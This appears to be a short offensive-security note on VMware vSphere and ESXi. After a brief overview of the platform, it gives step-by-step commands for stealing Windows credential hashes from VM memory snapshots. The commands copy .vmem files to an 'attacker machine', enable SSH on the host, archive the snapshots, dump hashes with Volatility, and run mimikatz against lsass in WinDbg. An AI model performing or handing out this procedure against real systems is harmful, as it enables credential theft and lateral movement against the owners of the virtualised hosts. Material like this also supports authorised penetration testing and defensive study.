vSphere & ESXi

vSphere is VMware's virtualization platform for managing virtualized data centers. It includes tools like vCenter Server for centralized management and a suite of services for deploying, running, and managing virtual machines.

ESXi is the hypervisor component of vSphere. It is a lightweight, bare-metal hypervisor installed directly on physical servers, allowing them to host multiple virtual machines by abstracting hardware resources.

vSphere/ESXi Windows VM Hash Extraction

This method allows to extract hashes from memory snapshots of virtual machines managed by vSphere.

Steps to Extract Windows Hashes via vSphere Snapshots

Create a snapshot of the virtual machine that has active sessions of interest.

1. From vSphere, open the datastore browser.

2. Copy the .vmem file from the vsanDatastore to the Local Datastore.

3. Download it from the Local Datastore to your local attacker machine.

To download it compressed via SSH, first enable SSH on the vSphere host, then log in and locate the snapshot path:

cd /vmfs/volumes/65c……9719e2c

ls -lah

Compress the snapshot files:

tar -cvf snapshot.tar.gz xxx1.vmsn xxx2.vmsn

Download it from the GUI and transfer to attacker machine (or use socks and download to attacker machine directly using the vSphere GUI).

Then use volatility to dump credentials:

vol.py -f xx.vmem windows.hashdump.Hashdump

vol.py -f xx.vmem windows.lsadump

Extract the memory file from the snapshot:

vmss2core.exe -W8 xxx.vmsn xxx.vmem

Load the memory dump into WinDbg and execute:

.load C:\mimilib.dll

!process 0 0 lsass.exe

.process /r /p <EPROCESS address>

!mimikatz